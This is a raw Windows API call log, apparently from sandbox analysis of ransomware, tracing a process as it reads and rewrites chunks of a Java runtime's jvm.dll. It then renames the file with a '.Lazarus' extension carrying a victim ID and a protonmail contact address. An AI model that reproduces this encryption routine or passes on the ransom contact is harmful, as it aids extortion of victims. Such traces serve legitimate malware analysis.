SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.805] CloseHandle (hObject=0x368) returned 1 [0093.805] AreFileApisANSI () returned 1 [0093.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0093.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0093.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa") returned 58 [0093.805] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.805] GetLastError () returned 0x5 [0093.805] GetLastError () returned 0x5 [0093.805] SetLastError (dwErrCode=0x5) [0093.805] GetLastError () returned 0x5 [0093.805] SetLastError (dwErrCode=0x5) [0093.805] GetLastError () returned 0x5 [0093.805] SetLastError (dwErrCode=0x5) [0093.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0093.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.806] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.806] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x866c40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jvm.dll", cAlternateFileName="")) returned 1 [0093.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0093.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0093.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0093.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ad80 [0093.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0093.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0093.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0093.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0093.807] AreFileApisANSI () returned 1 [0093.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll", lpUsedDefaultChar=0x0) returned 54 [0093.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0093.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.807] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0093.807] AreFileApisANSI () returned 1 [0093.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.807] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0093.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 54 [0093.807] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.808] GetFileType (hFile=0x368) returned 0x1 [0093.808] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.808] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.808] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.808] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.809] CloseHandle (hObject=0x368) returned 1 [0093.809] AreFileApisANSI () returned 1 [0093.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.809] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0093.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 54 [0093.809] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.809] GetFileType (hFile=0x368) returned 0x1 [0093.809] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.809] CloseHandle (hObject=0x368) returned 1 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.810] AreFileApisANSI () returned 1 [0093.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.810] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0093.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 54 [0093.810] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x866c40)) returned 1 [0093.810] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.810] AreFileApisANSI () returned 1 [0093.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0093.811] GetLastError () returned 0x0 [0093.811] SetLastError (dwErrCode=0x0) [0093.811] AreFileApisANSI () returned 1 [0093.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.811] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0093.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 54 [0093.811] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.811] GetFileType (hFile=0x368) returned 0x1 [0093.811] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0093.812] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0093.812] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0093.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0093.823] ReadFile (in: hFile=0x368, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0093.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0093.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0093.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de00 [0093.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x964b8 [0093.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0093.824] GetLastError () returned 0x0 [0093.824] SetLastError (dwErrCode=0x0) [0093.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0093.825] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0093.825] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0093.825] WriteFile (in: hFile=0x368, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0093.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0093.825] CloseHandle (hObject=0x368) returned 1 [0093.826] AreFileApisANSI () returned 1 [0093.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75cd8 [0093.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 54 [0093.826] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.826] GetFileType (hFile=0x368) returned 0x1 [0093.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0093.826] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0093.826] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0093.829] ReadFile (in: hFile=0x368, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0093.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0093.830] GetLastError () returned 0x0 [0093.830] SetLastError (dwErrCode=0x0) [0093.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0093.830] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0093.830] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0093.830] WriteFile (in: hFile=0x368, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0093.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0093.831] CloseHandle (hObject=0x368) returned 1 [0093.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0093.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71688 [0093.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0093.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0093.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0093.831] AreFileApisANSI () returned 1 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll") returned 54 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0093.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe8) returned 0x4ebc8 [0093.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=116 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 116 [0093.831] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x964b8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0093.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.832] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x58f, dwReserved0=0xb168ab5c, dwReserved1=0x1fea37cf, cFileName="Xusage.txt", cAlternateFileName="")) returned 1 [0093.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0093.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 